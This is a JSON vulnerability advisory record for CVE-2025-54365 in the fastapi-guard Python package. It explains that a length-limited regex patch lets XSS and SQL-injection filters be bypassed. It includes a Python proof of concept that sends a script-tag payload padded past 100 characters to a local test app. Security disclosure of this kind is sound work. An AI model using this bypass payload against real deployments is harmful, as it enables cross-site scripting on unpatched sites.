{"id":"CVE-2025-54365","aliases":["GHSA-rrf6-pxg8-684g","PYSEC-2026-1360"],"url":"https://o3.security/vulnerability/CVE-2025-54365","summary":"fastapi-guard patch contains bypassable RegEx","details":"### Summary\n\nThe regular expression patched to mitigate the ReDoS vulnerability by limiting the length of string fails to catch inputs that exceed this limit.\n\n### Details\n\nIn version 3.0.1, you can find a commit like the one in the link below, which was made to prevent ReDoS.\nhttps://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f\n\nThis commit mitigates the vulnerability by limiting the length of the input string, as shown in the example below.\n`r\"<script[^>]*>[^<]*<\\\\/script\\\\s*>\"` -> `<script[^>]{0,100}>[^<]{0,1000}<\\\\/script\\\\s{0,10}>`\n\nThis type of patch fails to catch cases where the string representing the attributes of a <script> tag exceeds 100 characters.\nTherefore, most of the regex patterns present in version 3.0.1 can be bypassed.\n\n### PoC\n\n1. clone the fastapi-guard repository\n2. Navigate to the examples directory and modify the main.py source code. Change the HTTP method for the root route from GET to POST.\n<img width=\"1013\" height=\"554\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cf93ea37-2fd7-4251-abb6-b55f88685f54\" />\n3. After that, set up the example app environment by running the docker-compose up command. Then, run the Python code below to verify that the two requests return different results.\n\n```python\nimport requests\n\nURL = \"<http://localhost:8000>\"\n\nobvious_payload = {\n    \"obvious\" : \"<script>alert(1);</script>\"\n}\nresponse = requests.post(url=URL, json=obvious_payload)\nprint(f\"[+] response of first request: {response.text}\")\n\nbypassed_payload = {\n    \"suspicious\" : f'<script id=\"i_can_bypass_regex_filtering{'a'*100}\">alert(1)</script>'\n}\n\nresponse = requests.post(url=URL, json=bypassed_payload)\nprint(f\"[+] response of second request: {response.text}\")\n\n```\n<img width=\"836\" height=\"112\" alt=\"image\" src=\"https://github.com/user-attachments/assets/11dcccb2-6179-44b1-9628-ae0a787e3bb7\" />\n\n### Impact\n\nDue to this vulnerability, most of the regex patterns can potentially be bypassed, making the application vulnerable to attacks such as XSS and SQL Injection.","published":"2025-07-23T22:11:36.441Z","modified":"2026-08-12T03:51:39.058731764Z","cvss":null,"epss":{"score":0.00734,"percentile":0.51646,"asOf":"2026-08-24"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"PyPI","name":"fastapi-guard","fixedVersion":"3.0.2"}],"fix":{"url":"https://github.com/rennf93/fastapi-guard/commit/0829292c322d33dc14ab00c5451c5c138148035a","label":"rennf93/fastapi-guard@0829292"},"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/54xxx/CVE-2025-54365.json"},{"type":"ADVISORY","url":"https://github.com/rennf93/fastapi-guard/security/advisories/GHSA-rrf6-pxg8-684g"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54365"},{"type":"FIX","url":"https://github.com/rennf93/fastapi-guard/commit/0829292c322d33dc14ab00c5451c5c138148035a"},{"type":"FIX","url":"https://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f"},{"type":"PACKAGE","url":"https://github.com/rennf93/fastapi-guard"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:39.058731764Z"}}